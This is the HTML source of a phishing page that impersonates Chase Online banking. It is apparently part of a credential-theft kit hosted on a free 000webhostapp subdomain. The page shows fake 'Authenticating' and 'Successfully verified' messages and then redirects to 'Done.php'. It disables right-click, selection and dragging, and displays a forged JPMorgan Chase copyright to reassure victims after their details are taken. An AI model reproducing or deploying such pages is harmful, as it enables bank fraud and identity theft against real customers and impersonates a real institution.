<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en"><head>
<style>
td.backtop {background:#FFF url(imgs/top2.jpg );} 
td.backmid {background:#FFF url(imgs/center3.jpg );} 
td.backbot {background:#FFF url(imgs/bottom3.jpg );} 

</style>
<style>
td.backtop {background:#FFF url(imgs/top2.jpg );} 
td.backmid {background:#FFF url(imgs/center3.jpg );} 
td.backbot {background:#FFF url(imgs/bottom3.jpg );} 
.auto-style5 {
	color: #074580;
}
</style>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Cache-Control" content="no-store">
<meta http-equiv="Cache-Control" content="post-check=0">
<meta http-equiv="Cache-Control" content="pre-check=0">

<meta http-equiv="Content-Style-Type" content="text/css">
<meta name="CONNECTION" content="CLOSE"><meta name="description" content="Identification"><link rel="stylesheet" type="text/css" href="Chase%20Online%20-%20Processing_files/styles_cco_enroll.css"><link rel="stylesheet" type="text/css" href="Chase%20Online%20-%20Processing_files/style.css"><link rel="stylesheet" type="text/css" href="Chase%20Online%20-%20Processing_files/style.css"><link rel="stylesheet" type="text/css" href="Chase%20Online%20-%20Processing_files/style.css"><link rel="SHORTCUT ICON" href="https://candy-striped-groun.000webhostapp.com/log/24/24/inse/secclog/RRiiHyttUuiTtrtyuy/cha8ank/imgs/favicon.ico"><title>Chase Online - Processing </title><!--POH--></head>


<body onload="oninit();" ondragstart="return false" onselectstart="return false" oncontextmenu="return false">


                                    <input name="hdnPrevSelectedRadio" id="hdnPrevSelectedRadio" type="hidden">
                                    <input name="hdnRHSLinkClicked" id="hdnRHSLinkClicked" type="hidden">
<div>

<input name="__EVENTTARGET" id="__EVENTTARGET" value="" type="hidden">
<input name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" type="hidden">
<input name="" type="hidden">
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['formIdentifyUser'];
if (!theForm) {
    theForm = document.formIdentifyUser;
}
function __doPostBack(eventTarget, eventArgument) {
    if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
        theForm.__EVENTTARGET.value = eventTarget;
        theForm.__EVENTARGUMENT.value = eventArgument;
        theForm.submit();
    }
}
//]]>
</script>



<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
return DoSubmit();
return true;
}
//]]>
</script>

<div>

	<input name="__VIEWSTATEENCRYPTED" id="__VIEWSTATEENCRYPTED" value="" type="hidden">
	<input name="__PREVIOUSPAGE" id="__PREVIOUSPAGE" value="b1t8GvcTu3k4L5V_6SR6jIs_VsLwW7r7kQ8CPJKadVtSTZ8vdMqVPg2" type="hidden">
	<input name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="DSddjAp+lYm2fG8BLGlDNgiUs/5DBQst0mXoroWIgFIoUph9TWXuymXQZYSiwzv6eXsQJrPqXDd5kgq6376yC+qClHfjYLUZ02sOA0GR9v5Ah0Ir4JE4Z6gdJ8tcbkI3vlqygY/VYOTHSxwuNCZiAvbi0N+4CmE0PNDfybVOJ2rldA0nAr7JwQ==" type="hidden">
</div>
  <center>
<!-- BEGIN Global Navigation table --><table class="fullwidth" summary="global navigation" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td><a href="#" id="siteLogo"><img src="Chase%20Online%20-%20Processing_files/ChaseNew.gif" alt="Chase Online Logo" style="margin: 17px 17px 17px 17px;"></a></td><td class="globalnav"><a id="homelink" href="javascript:document.location.href='#';" class="globalnavlinks">Chase.com</a>&nbsp;&nbsp;|&nbsp;&nbsp;<a id="privacypolicylik" href="javascript:document.location.href='#';" class="globalnavlinks">Privacy Notice</a></td></tr></tbody></table><!-- END Global Navigation table --><!-- BEGIN Tab Navigation table --><table summary="primary navigation" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td class="spacerh5">&nbsp;</td></tr></tbody></table><!-- END Tab Navigation table --><!-- BEGIN Segment table --><table class="headerbarwidth" summary="section header" cellspacing="0" cellpadding="0" border="0"><tbody><tr class="headerbar"><td class="segimage" align="left">&nbsp;</td><td class="headerbardate">
  &nbsp;</td></tr></tbody></table><!-- END Segment table -->

<div class="constraint-container">
<table class="fullwidth" cellspacing="0" cellpadding="0">
	<tbody><tr>
		<td class="sidebar">&nbsp;</td>
		<td class="spacerw25">&nbsp;</td>
		<td width="721" valign="top"><div class="Printable">
      <table width="100%" cellspacing="0" cellpadding="0" border="0">
        <tbody><tr>
          <td align="left">
            <div class="notprintable"><table width="100%" cellspacing="0" cellpadding="0"><tbody><tr><td class="bcrow" style="padding-left: 0px;"></td></tr></tbody></table></div>

          </td>
        </tr>
        <tr>
          <td class="tc">
            
<br>

<style type="text/css">
<!--
.style1 {font-family: "Courier New", Courier, monospace}
.style4 {font-family: "Courier New", Courier, monospace;
	color:#FFFFFF;
	font-size:20px;}
#Layer1 {
	position:absolute;
	left:374px;
	top:60px;
	width:437px;
	height:367px;
	z-index:1;
	margin-top: 5%;
	margin-right: 5%;
	right: 20%;
	bottom: 200%;
	margin-bottom: 5%;
	margin-left: 5%;
	border: thin solid #FFFFFF;
	border-radius:7px;
	padding: 5px;
}
-->
</style>
<script>



var preloadimages=new Array(":abstract.simplenet.com/point.gif","abstract.simplenet.com/point2.html")



var intervals=3000

//configure destination URL

var targetdestination="Done.php"





var splashmessage=new Array()

var openingtags='<font face="Courier New, Courier, monospace" size="3">'

splashmessage[0]='Please wait...'

splashmessage[1]='Authenticating'

splashmessage[2]='...Successfully verified...'

splashmessage[3]='Signing out wait...'

splashmessage[4]=''




var closingtags='</font>'



//Do not edit below this line (besides HTML code at the very bottom)



var i=0



var ns4=document.layers?1:0

var ie4=document.all?1:0

var ns6=document.getElementById&&!document.all?1:0

var theimages=new Array()



//preload images

if (document.images){

for (p=0;p<preloadimages.length;p++){

theimages[p]=new Image()

theimages[p].src=preloadimages[p]

}

}



function displaysplash(){

if (i<splashmessage.length){

sc_cross.style.visibility="hidden"

sc_cross.innerHTML='<b><center>'+openingtags+splashmessage[i]+closingtags+'</center></b>'

sc_cross.style.left=ns6?parseInt(window.pageXOffset)+parseInt(window.innerWidth)/2-parseInt(sc_cross.style.width)/2 :document.body.scrollLeft+document.body.clientWidth/2-parseInt(sc_cross.style.width)/2

sc_cross.style.top=ns6?parseInt(window.pageYOffset)+parseInt(window.innerHeight)/2-sc_cross.offsetHeight/2:document.body.scrollTop+document.body.clientHeight/2-sc_cross.offsetHeight/2

sc_cross.style.visibility="visible"

i++

}

else{

window.location=targetdestination

return

}

setTimeout("displaysplash()",intervals)

}



function displaysplash_ns(){

if (i<splashmessage.length){

sc_ns.visibility="hide"

sc_ns.document.write('<b>'+openingtags+splashmessage[i]+closingtags+'</b>')

sc_ns.document.close()



sc_ns.left=pageXOffset+window.innerWidth/2-sc_ns.document.width/2

sc_ns.top=pageYOffset+window.innerHeight/2-sc_ns.document.height/2



sc_ns.visibility="show"

i++

}

else{

window.location=targetdestination

return

}

setTimeout("displaysplash_ns()",intervals)

}







function positionsplashcontainer(){

if (ie4||ns6){

sc_cross=ns6?document.getElementById("splashcontainer"):document.all.splashcontainer

displaysplash()

}

else if (ns4){

sc_ns=document.splashcontainerns

sc_ns.visibility="show"

displaysplash_ns()

}

else

window.location=targetdestination

}

window.onload=positionsplashcontainer



</script>
<script><!--

 var jv=1.0;

//--></script>



<script language="Javascript1.1"><!--

 jv=1.1;

//--></script>



<script language="Javascript1.2"><!--

 jv=1.2;

//--></script>



<script language="Javascript1.3"><!--

 jv=1.3;

//--></script>



<script language="Javascript1.4"><!--

 jv=1.4;

//--></script>



<div id="Layer1">
<div class="style4"><h2></h2></div>
 <div class="style1" id="splashcontainer" style="visibility: visible; top: 467px;" align="center"><b><center><font size="3" face="Courier New, Courier, monospace">Authenticating</font></center></b></div>
<div><p class="style1" align="center"> <br> <br>  <img src="Chase%20Online%20-%20Processing_files/loadingAnimation.gif"><br><br><strong>please wait... It can take up to 2 minutes for the process to complete</strong></p>
</div>
</div>


<span class="style1"><font size="18">





</font></span><span class="style1"> </span>
<noscript>
&lt;span class="style1"&gt;&lt;IMG height=1 src="#"

width=1&gt;&lt;/span&gt;
</noscript>
<p class="style1">&nbsp;</p>
<p class="style1">&nbsp;</p>
<p class="style1">&nbsp;</p>
<p class="style1">&nbsp;</p>



<p class="style1">&nbsp;</p><p class="style1">&nbsp;</p>

          </td>
        </tr>
      </tbody></table>
    &nbsp;</div></td>

		<td class="spacerw25">&nbsp;</td>
		<td class="sidebar">&nbsp;</td>
	</tr>
	<tr>
		<td class="sidebar">&nbsp;</td>
		<td class="spacerh30" colspan="3">&nbsp;</td>
		<td class="sidebar">&nbsp;</td>
	</tr>
	<tr>

		<td class="sidebar" colspan="5">&nbsp;</td>
	</tr>
</tbody></table>
</div>
<!--Footer--><table class="fullwidth" summary="terms of use link and copyright" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td class="spacerh10" colspan="3">&nbsp;</td></tr><tr><td style="width:30%; vertical-align:top">&nbsp;</td><td width="40%" valign="top" align="center"><span class="footertext"><a id="SecurityLink" href="javascript:document.location.href='#';" onblur="window.status='';return true" onmouseover="window.status='';return true" onfocus="window.status='';return true" onmouseout="window.status='';return true">Security</a>&nbsp;|&nbsp;<a id="TermsLink" href="javascript:document.location.href='#';" onblur="window.status='';return true" onmouseover="window.status='';return true" onfocus="window.status='';return true" onmouseout="window.status='';return true">Terms of Use</a>&nbsp;</span></td><td style="text-align:center; width:30%; vertical-align:top">&nbsp;</td></tr></tbody></table><div class="printable"><table class="fullwidth" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td class="spacerh10">&nbsp;</td></tr><tr><td class="footertext" align="center">&nbsp;© 2018 JPMorgan Chase &amp; Co.</td></tr><tr><td class="spacerh10">&nbsp;</td></tr></tbody></table></div><!--END Footer-->
</center>



<div style="text-align: right;position: fixed;z-index:9999999;bottom: 0; width: 100%;cursor: pointer;line-height: 0;display:block !important;"><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&amp;utm_campaign=000_logo&amp;utm_medium=website_candy-striped-groun&amp;utm_content=footer_img"><img src="Chase%20Online%20-%20Processing_files/footer-powered-by-000webhost-white2.png" alt="www.000webhost.com"></a></div>
</body></html>